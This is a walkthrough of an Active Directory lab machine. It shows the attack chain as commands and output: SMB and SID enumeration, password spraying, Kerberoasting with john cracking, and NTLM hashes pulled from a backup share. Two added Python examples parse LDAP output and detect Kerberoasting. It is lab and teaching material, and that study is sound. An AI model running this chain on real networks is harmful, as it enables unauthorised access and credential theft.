Difficulty: easy

Kali: 192.168.56.104

Target: 192.168.56.128

> arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:05       (Unknown: locally administered)
192.168.56.100  08:00:27:3b:0f:e6       PCS Systemtechnik GmbH
192.168.56.128  08:00:27:68:1c:ef       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.930 seconds (132.64 hosts/sec). 3 responded

Port scan

> nmap -p- -sV -A -sS -T4 192.168.56.128                                      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-15 12:24 CST
Nmap scan report for 192.168.56.128
Host is up (0.00020s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-15 19:26:22Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49683/tcp open  msrpc         Microsoft Windows RPC
49702/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:68:1C:EF (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|11|2016 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (97%), Microsoft Windows 11 21H2 (91%), Microsoft Windows Server 2016 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-07-15T19:27:14
|_  start_date: N/A
|_clock-skew: 14h59m57s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:68:1c:ef (Oracle VirtualBox virtual NIC)

TRACEROUTE
HOP RTT     ADDRESS
1   0.20 ms 192.168.56.128

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 185.67 seconds

Many ports are open, including DNS, LDAP and SMB services. Start with the familiar one, SMB.

SMB enumeration

Try an anonymous login first

> smbmap -H  192.168.56.128 -u anonymous

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 192.168.56.128:445      Name: 192.168.56.128            Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        backup                                                  NO ACCESS
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        SYSVOL                                                  NO ACCESS       Logon server share 
        Users                                                   NO ACCESS

There are shares; IPC$ is the only one readable anonymously

> smbclient  //192.168.56.128/IPC$
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_NO_SUCH_FILE listing \*
smb: \> 

IPC$ can be opened but is empty. With IPC$ accessible, domain users can be enumerated by SID brute-forcing with lookupsid.py

> lookupsid.py anonymous@192.168.56.128
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

Password:
[*] Brute forcing SIDs at 192.168.56.128
[*] StringBinding ncacn_np:192.168.56.128[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2986980474-46765180-2505414164
498: SOUPEDECODE\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: SOUPEDECODE\Administrator (SidTypeUser)
501: SOUPEDECODE\Guest (SidTypeUser)
502: SOUPEDECODE\krbtgt (SidTypeUser)
512: SOUPEDECODE\Domain Admins (SidTypeGroup)
513: SOUPEDECODE\Domain Users (SidTypeGroup)
514: SOUPEDECODE\Domain Guests (SidTypeGroup)
515: SOUPEDECODE\Domain Computers (SidTypeGroup)
516: SOUPEDECODE\Domain Controllers (SidTypeGroup)
517: SOUPEDECODE\Cert Publishers (SidTypeAlias)
518: SOUPEDECODE\Schema Admins (SidTypeGroup)
519: SOUPEDECODE\Enterprise Admins (SidTypeGroup)
520: SOUPEDECODE\Group Policy Creator Owners (SidTypeGroup)
521: SOUPEDECODE\Read-only Domain Controllers (SidTypeGroup)
522: SOUPEDECODE\Cloneable Domain Controllers (SidTypeGroup)
525: SOUPEDECODE\Protected Users (SidTypeGroup)
...
...

Turn the enumerated names into a username wordlist (the lookupsid.py output was saved to users.txt; substr($2, 13) strips the SOUPEDECODE\ prefix)

cat users.txt | awk '{print substr($2, 13)}' > username.txt

Brute-force passwords over SMB, trying each username as its own password

msf6 auxiliary(scanner/smb/smb_login) > set USER_FILE username.txt
USER_FILE => username.txt
msf6 auxiliary(scanner/smb/smb_login) > set USER_AS_PASS true
USER_AS_PASS => true
msf6 auxiliary(scanner/smb/smb_login) > run

[-] Msf::OptionValidateError One or more options failed to validate: RHOSTS.
msf6 auxiliary(scanner/smb/smb_login) > set rhost 192.168.56.128
rhost => 192.168.56.128
msf6 auxiliary(scanner/smb/smb_login) > run
[+] 192.168.56.128:445    - 192.168.56.128:445 - Success: '.\ybob317:ybob317'

This gives one credential pair: ybob317:ybob317

> smbclient //192.168.56.128/Users -U ybob317
Password for [WORKGROUP\ybob317]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Tue Jun 18 01:24:29 2024
  ..                                DHS        0  Tue Jun 18 01:42:50 2024
  Administrator                       D        0  Sun Jun 16 03:56:40 2024
  All Users                       DHSrn        0  Sat May  8 16:26:16 2021
  Default                           DHR        0  Sun Jun 16 10:51:08 2024
  Default User                    DHSrn        0  Sat May  8 16:26:16 2021
  desktop.ini                       AHS      174  Sat May  8 16:14:03 2021
  Public                             DR        0  Sun Jun 16 01:54:32 2024
  ybob317                             D        0  Tue Jun 18 01:24:32 2024

                12942591 blocks of size 4096. 10795715 blocks available
smb: \> cd ybob317
smb: \ybob317\> ls
  .                                   D        0  Tue Jun 18 01:24:32 2024
  ..                                 DR        0  Tue Jun 18 01:24:29 2024
  3D Objects                         DR        0  Tue Jun 18 01:24:32 2024
  AppData                            DH        0  Tue Jun 18 01:24:30 2024
  Application Data                DHSrn        0  Tue Jun 18 01:24:30 2024
  Contacts                           DR        0  Tue Jun 18 01:24:32 2024
  Cookies                         DHSrn        0  Tue Jun 18 01:24:30 2024
  Desktop                            DR        0  Tue Jun 18 01:45:32 2024
  Documents                          DR        0  Tue Jun 18 01:24:32 2024
  Downloads                          DR        0  Tue Jun 18 01:24:32 2024
  Favorites                          DR        0  Tue Jun 18 01:24:32 2024
  Links                              DR        0  Tue Jun 18 01:24:32 2024
  Local Settings                  DHSrn        0  Tue Jun 18 01:24:30 2024
  Music                              DR        0  Tue Jun 18 01:24:32 2024
  My Documents                    DHSrn        0  Tue Jun 18 01:24:30 2024
  NetHood                         DHSrn        0  Tue Jun 18 01:24:30 2024
  NTUSER.DAT                        AHn   262144  Tue Jul 16 03:28:25 2024
  ntuser.dat.LOG1                   AHS    49152  Tue Jun 18 01:24:29 2024
  ntuser.dat.LOG2                   AHS        0  Tue Jun 18 01:24:29 2024
  NTUSER.DAT{3e6aec0f-2b8b-11ef-bb89-080027df5733}.TM.blf    AHS    65536  Tue Jun 18 01:24:54 2024
  NTUSER.DAT{3e6aec0f-2b8b-11ef-bb89-080027df5733}.TMContainer00000000000000000001.regtrans-ms    AHS   524288  Tue Jun 18 01:24:29 2024
  NTUSER.DAT{3e6aec0f-2b8b-11ef-bb89-080027df5733}.TMContainer00000000000000000002.regtrans-ms    AHS   524288  Tue Jun 18 01:24:29 2024
  ntuser.ini                        AHS       20  Tue Jun 18 01:24:30 2024
  Pictures                           DR        0  Tue Jun 18 01:24:32 2024
  Recent                          DHSrn        0  Tue Jun 18 01:24:30 2024
  Saved Games                        DR        0  Tue Jun 18 01:24:32 2024
  Searches                           DR        0  Tue Jun 18 01:24:32 2024
  SendTo                          DHSrn        0  Tue Jun 18 01:24:30 2024
  Start Menu                      DHSrn        0  Tue Jun 18 01:24:30 2024
  Templates                       DHSrn        0  Tue Jun 18 01:24:30 2024
  Videos                             DR        0  Tue Jun 18 01:24:32 2024

                12942591 blocks of size 4096. 10795715 blocks available
smb: \ybob317\> cd Desktop
smb: \ybob317\Desktop\> ls
  .                                  DR        0  Tue Jun 18 01:45:32 2024
  ..                                  D        0  Tue Jun 18 01:24:32 2024
  desktop.ini                       AHS      282  Tue Jun 18 01:24:32 2024
  user.txt                            A       32  Wed Jun 12 19:54:32 2024

                12942591 blocks of size 4096. 10795715 blocks available
smb: \ybob317\Desktop\> get user.txt

Got the user flag

LDAP enumeration

Ports 389, 636, 3268 and 3269 are LDAP; start by querying the root DSE with ldapsearch

> ldapsearch -H ldap://192.168.56.128 -x -s base -b '' "(objectClass=*)" "*" + 
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectClass=*)
# requesting: * + 
#

#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=SOUPEDECODE,DC=LOCAL
ldapServiceName: SOUPEDECODE.LOCAL:dc01$@SOUPEDECODE.LOCAL
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=L
 OCAL
serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configur
 ation,DC=SOUPEDECODE,DC=LOCAL
schemaNamingContext: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL
namingContexts: DC=SOUPEDECODE,DC=LOCAL
namingContexts: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL
namingContexts: CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL
namingContexts: DC=DomainDnsZones,DC=SOUPEDECODE,DC=LOCAL
namingContexts: DC=ForestDnsZones,DC=SOUPEDECODE,DC=LOCAL
isSynchronized: TRUE
highestCommittedUSN: 53264
dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,
 CN=Sites,CN=Configuration,DC=SOUPEDECODE,DC=LOCAL
dnsHostName: DC01.SOUPEDECODE.LOCAL
defaultNamingContext: DC=SOUPEDECODE,DC=LOCAL
currentTime: 20240715202250.0Z
configurationNamingContext: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

This gives the DNS host name DC01.SOUPEDECODE.LOCAL and the domain name SOUPEDECODE.LOCAL; add them to /etc/hosts

192.168.56.128 dc01.soupedecode.local soupedecode.local
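The hosts entry above is derived from two root DSE attributes, dnsHostName and defaultNamingContext. The parser below is an added example and is not part of the original write-up: it unfolds the LDIF continuation lines that ldapsearch wraps with a leading space (the subschemaSubentry value above is split that way), collects the root DSE attributes, and builds the hosts line. SAMPLE_LDIF is a constructed excerpt of the output shown above, and the function names are my own.

```python
"""Parse an anonymous root DSE query result and derive the /etc/hosts entry.

Added example; not part of the original write-up. SAMPLE_LDIF is a
constructed excerpt of the ldapsearch output above, including one folded
continuation line, and the function names are my own.
"""
from collections import defaultdict


SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
#

#
dn:
domainFunctionality: 7
rootDomainNamingContext: DC=SOUPEDECODE,DC=LOCAL
ldapServiceName: SOUPEDECODE.LOCAL:dc01$@SOUPEDECODE.LOCAL
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=SOUPEDECODE,DC=L
 OCAL
namingContexts: DC=SOUPEDECODE,DC=LOCAL
namingContexts: CN=Configuration,DC=SOUPEDECODE,DC=LOCAL
dnsHostName: DC01.SOUPEDECODE.LOCAL
defaultNamingContext: DC=SOUPEDECODE,DC=LOCAL

# search result
search: 2
result: 0 Success
"""


def unfold_ldif(text):
    """Join LDIF continuation lines: a line starting with a single space
    continues the previous line (RFC 2849), which is how ldapsearch wraps
    long values such as subschemaSubentry above."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def parse_root_dse(text):
    """Return {attribute: [values]} for the first entry in the LDIF.

    Comment lines are skipped; the entry starts at its 'dn:' line and ends
    at the next blank line, so trailer lines like 'result: 0 Success' are
    not mistaken for attributes."""
    attrs = defaultdict(list)
    in_entry = False
    for line in unfold_ldif(text):
        if line.startswith("#"):
            continue
        if not in_entry:
            if line.startswith("dn:"):
                in_entry = True
            continue
        if line == "":
            break
        name, sep, value = line.partition(":")
        if sep:
            attrs[name.strip()].append(value.strip())
    return dict(attrs)


def dn_to_domain(dn):
    """'DC=SOUPEDECODE,DC=LOCAL' -> 'soupedecode.local'."""
    labels = [rdn.split("=", 1)[1] for rdn in dn.split(",")
              if rdn.strip().upper().startswith("DC=")]
    return ".".join(labels).lower()


def hosts_entry(ip, ldif_text):
    """Build the hosts line '<ip> <dc fqdn> <domain>' from the root DSE."""
    attrs = parse_root_dse(ldif_text)
    fqdn = attrs["dnsHostName"][0].lower()
    domain = dn_to_domain(attrs["defaultNamingContext"][0])
    return f"{ip} {fqdn} {domain}"


if __name__ == "__main__":
    print(hosts_entry("192.168.56.128", SAMPLE_LDIF))
```

Stopping at the blank line that closes the entry matters: without it, the `search:` and `result:` trailer lines would be collected as attributes. The same root DSE is what tells a defender how much a DC discloses to unauthenticated binds; the domain name, DC host name and functional levels are all readable here without credentials.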

Kerberoasting

First request TGS tickets for the accounts that have an SPN set

> GetUserSPNs.py -request -dc-ip 192.168.56.128 soupedecode.local/ybob317  -outputfile hashes.kerberoast
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

Password:
ServicePrincipalName    Name            MemberOf  PasswordLastSet             LastLogon 
----------------------  --------------  --------  --------------------------  ---------
FTP/FileServer          file_svc                  2024-06-18 01:32:23.726085  <never>   
FW/ProxyServer          firewall_svc              2024-06-18 01:28:32.710125  <never>   
HTTP/BackupServer       backup_svc                2024-06-18 01:28:49.476511  <never>   
HTTP/WebServer          web_svc                   2024-06-18 01:29:04.569417  <never>   
HTTPS/MonitoringServer  monitoring_svc            2024-06-18 01:29:18.511871  <never>   



[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

This is caused by the clock difference between the target and my Kali box; sync the time with ntpdate

> ntpdate 192.168.56.128
2024-07-16 05:50:17.021809 (+0800) +53997.567713 +/- 0.000341 192.168.56.128 s1 no-leap
CLOCK: time stepped by 53997.567713

> GetUserSPNs.py -request -dc-ip 192.168.56.128 soupedecode.local/ybob317:ybob317                              

/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

ServicePrincipalName    Name            MemberOf  PasswordLastSet             LastLogon 
----------------------  --------------  --------  --------------------------  ---------
FTP/FileServer          file_svc                  2024-06-18 01:32:23.726085  <never>   
FW/ProxyServer          firewall_svc              2024-06-18 01:28:32.710125  <never>   
HTTP/BackupServer       backup_svc                2024-06-18 01:28:49.476511  <never>   
HTTP/WebServer          web_svc                   2024-06-18 01:29:04.569417  <never>   
HTTPS/MonitoringServer  monitoring_svc            2024-06-18 01:29:18.511871  <never>   



$krb5tgs$23$*monitoring_svc$SOUPEDECODE.LOCAL$HTTPS/MonitoringServer*$f02f26591f0aef75426d7752ca0da996$...
$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$FTP/FileServer*$2d64339559980b4a517f73b22927e7fc$...
$krb5tgs$23$*backup_svc$SOUPEDECODE.LOCAL$HTTP/BackupServer*$f98fabfb92fcf6aecadefd3b8a4bdc65$046e82f2a4cbc668bcfbd9b6e38751d3f5fd30f158cea68f2f33d8cc139181b7b3324d5ef7ec6d765a5e71d0d2ae679e44c71722d0f6ff64f1143bf34ff6a318de1d619be7e6f64bb145072035965688245d1c047bd31518815a0d6e44834b6afcd0d47e780cba63a0921f92d51e941602c3bbb337d309fe8117d55c87e3b8c48a7394a51f6c91b0d0a8d69628f9ff088f1c81ca70b34466df43702b6599918081470b8e27ca18b246d5f666b844937627f98a0d8a8b69cf029ac6e8bda11ed8185b0e4dea0e767b9a7bb841dfe6219a554183fc411207f5b29e2e7bbf305b25dad6aeee1fdf9cf48fd41b330f0f3443bd7473f01a916258a569b9fe6ee96d337cf40bbfff0539244792edd9166c9184a434831bc2adc897539856d08e314265e02931bf0369199c349ce8a6af417cbe1fd200881e5539ba9c621b6984fc82b941c239e53ba25c07a551766cb76675d8b2d04a969e39bae49d4519b336248d7bf7967e29ab801ba743c3664c261b3014e11dd408094a2705ef0a7d014d4470fa54a5685e02969e2e06af8ad030a39520aa58e54520d979782cdc61e133f175c3fc10ed7d616d3a45f2abf6b4d93db14b5b9433129ba722a488f1a43f583a5570768fc5d8fb14868000ad0e232fbf1156db042dfda291b6f95effa7753176856c65d927a71fc2f6897f57661d2e0ec8c5b97247ec44c2989fdb1a45595ba47cc98f41850bb3663cac4d30bca745d0e37724169043cada53b96c602ae760beb3191b24b2403a812b0ad5cecbe5f6831e1f1bd51f79dc42b1f6405d21533719fe0b4fe75dff16db9a35ff869c99df937e09538a91010201bfd25931c23dab6b619674329df6c37bf400d2f54f2aff13e4f124e5aec5e942aa2e51ec8ca38327c9d138827ba41e5b06a1b2960617e0dcd13b3f1564a66914e15d784c3fa0f0a2be742357ce1e7e9b833f2b03c303e435a54ccfe74940947f14666786c47d53682ca630a4b69a966182cca60ff045f887f94669fbbe97caf6d5790af6f80fc0f3c1cb661b0ae6b6533a5885824c67f609b6e53c5b4e7b8bd0ba8dba9ea1daa3a001fbf8fde441aa1c5d963f77aa1676324729a236c84f960b8d414caddb869aa5822cf24455b061d0cfa8836aa35b4888c1ff57679b7260617e163d092de052e2557c6bfd49ce20e56d6b639097d7c828fc58e322d4f0e46e25d9d466f59520d2d781f1bd2fcd75e5cf6156b885e02acc27eba15d66a534d48bc12343c7b07ccd019b31e41de7d9ca07f90da3e6d5cb15f9e76b706b9dcb602f8aabbfff621fae7ef9e423f9fe14514d4c4eeeb2d73246d7a3aebf795ef45828f7ef
de263b806d7c5519e665216178d4d79186ccaa91f37268cf624e86104d22e6aa209ed64b763b6e3937343f9893c0bc15bb33ca22ec00837935d33d9cb1b862540a1c7a3bfe0321d851556103e824217b9e7de2a90a21348d2a4193141844fca7e9bfaeeec5477d2e
$krb5tgs$23$*firewall_svc$SOUPEDECODE.LOCAL$FW/ProxyServer*$ad4bb3d6193648b48dfe968dfbce59da$...
$krb5tgs$23$*web_svc$SOUPEDECODE.LOCAL$HTTP/WebServer*$a8a4ea82594dfa2f43915f0e31ace64d$...

Save the hashes to a file and run john against them with rockyou

> john aa --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Press 'q' or Ctrl-C to abort, almost any other key for status
Password123!!    (?)     
1g 0:00:01:11 DONE (2024-07-16 05:58) 0.01403g/s 201259p/s 955614c/s 955614C/s        1..1cm
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
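On the DC the request above leaves a clear trace: one account asks for service tickets for five different service accounts within a second or two, all with RC4 encryption (etype 23, the `$krb5tgs$23$` prefix in the hashes), which is what makes the tickets crackable with a wordlist. The detection below is an added example written from the defender's side and is not from the write-up. EVENTS is a constructed set of records shaped like the fields of Windows Security event 4769 (TargetUserName, ServiceName, TicketEncryptionType, IpAddress); the timestamps and the two benign entries are invented, and the function names are my own.

```python
"""Flag Kerberoasting-style activity in Windows Security event 4769 records.

Added example for the defender's side of the Kerberoasting step above; it is
not from the write-up. EVENTS is a constructed set of records shaped like the
4769 fields a DC logs (TargetUserName, ServiceName, TicketEncryptionType,
IpAddress); the timestamps and the benign entries are invented.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"          # etype 23: the encryption type in the $krb5tgs$23$ hashes above
WINDOW = timedelta(minutes=5)
SPN_THRESHOLD = 3          # distinct service accounts from one source within WINDOW

# Constructed sample events (not real logs). The five ybob317 lines mirror
# what one GetUserSPNs.py -request run would produce; the last two are benign.
EVENTS = [
    {"time": "2024-07-16T05:50:20", "user": "ybob317@SOUPEDECODE.LOCAL", "service": "monitoring_svc", "etype": "0x17", "ip": "192.168.56.104"},
    {"time": "2024-07-16T05:50:20", "user": "ybob317@SOUPEDECODE.LOCAL", "service": "file_svc",       "etype": "0x17", "ip": "192.168.56.104"},
    {"time": "2024-07-16T05:50:21", "user": "ybob317@SOUPEDECODE.LOCAL", "service": "backup_svc",     "etype": "0x17", "ip": "192.168.56.104"},
    {"time": "2024-07-16T05:50:21", "user": "ybob317@SOUPEDECODE.LOCAL", "service": "firewall_svc",   "etype": "0x17", "ip": "192.168.56.104"},
    {"time": "2024-07-16T05:50:21", "user": "ybob317@SOUPEDECODE.LOCAL", "service": "web_svc",        "etype": "0x17", "ip": "192.168.56.104"},
    {"time": "2024-07-16T05:51:02", "user": "DC01$@SOUPEDECODE.LOCAL",   "service": "krbtgt",         "etype": "0x12", "ip": "192.168.56.128"},
    {"time": "2024-07-16T06:10:00", "user": "jdoe@SOUPEDECODE.LOCAL",    "service": "web_svc",        "etype": "0x17", "ip": "192.168.56.50"},
]


def is_roast_candidate(event):
    """An RC4 service-ticket request for a user (non-machine) service account.

    krbtgt and machine accounts (names ending in $) are excluded: TGT renewals
    and host tickets are normal traffic, while RC4 tickets for user-owned
    SPNs are what a wordlist attack needs."""
    svc = event["service"]
    return (event["etype"] == RC4_HMAC
            and svc.lower() != "krbtgt"
            and not svc.endswith("$"))


def find_kerberoast_sources(events, window=WINDOW, threshold=SPN_THRESHOLD):
    """Return sorted (user, ip, distinct_services) tuples for sources that
    requested RC4 tickets for at least `threshold` different service
    accounts inside any `window`-long interval."""
    by_source = defaultdict(list)
    for e in events:
        if is_roast_candidate(e):
            by_source[(e["user"], e["ip"])].append(
                (datetime.fromisoformat(e["time"]), e["service"]))
    hits = []
    for (user, ip), reqs in by_source.items():
        reqs.sort()
        best = 0
        for i, (start, _) in enumerate(reqs):
            in_window = {svc for t, svc in reqs[i:] if t - start <= window}
            best = max(best, len(in_window))
        if best >= threshold:
            hits.append((user, ip, best))
    return sorted(hits)


if __name__ == "__main__":
    for user, ip, n in find_kerberoast_sources(EVENTS):
        print(f"{user} from {ip}: RC4 TGS for {n} service accounts within {WINDOW}")
```

The single RC4 request from jdoe stays below the threshold, so a real deployment would tune `SPN_THRESHOLD` and `WINDOW` to the environment; the more durable fix is on the accounts themselves: long random passwords for service accounts (or group managed service accounts) and AES-only ticket encryption, so that even a captured ticket is not crackable with rockyou as it was here. The clock-skew error earlier in this section is the same timing sensitivity from the other direction: the KDC rejects requests whose timestamp is outside its tolerance, which is why the attacker had to sync clocks before the request succeeded.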

One hash cracked: Password123!!, the password of file_svc. Try the shares with that account

Pass-the-hash

> smbclient //192.168.56.128/backup -U file_svc
Password for [WORKGROUP\file_svc]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Jun 18 01:41:17 2024
  ..                                 DR        0  Tue Jun 18 01:44:56 2024
  backup_extract.txt                  A      892  Mon Jun 17 16:41:05 2024

                12942591 blocks of size 4096. 10794376 blocks available
> cat backup_extract.txt                   
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41da7e79a4c76dbd9cf79d1cb325559:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
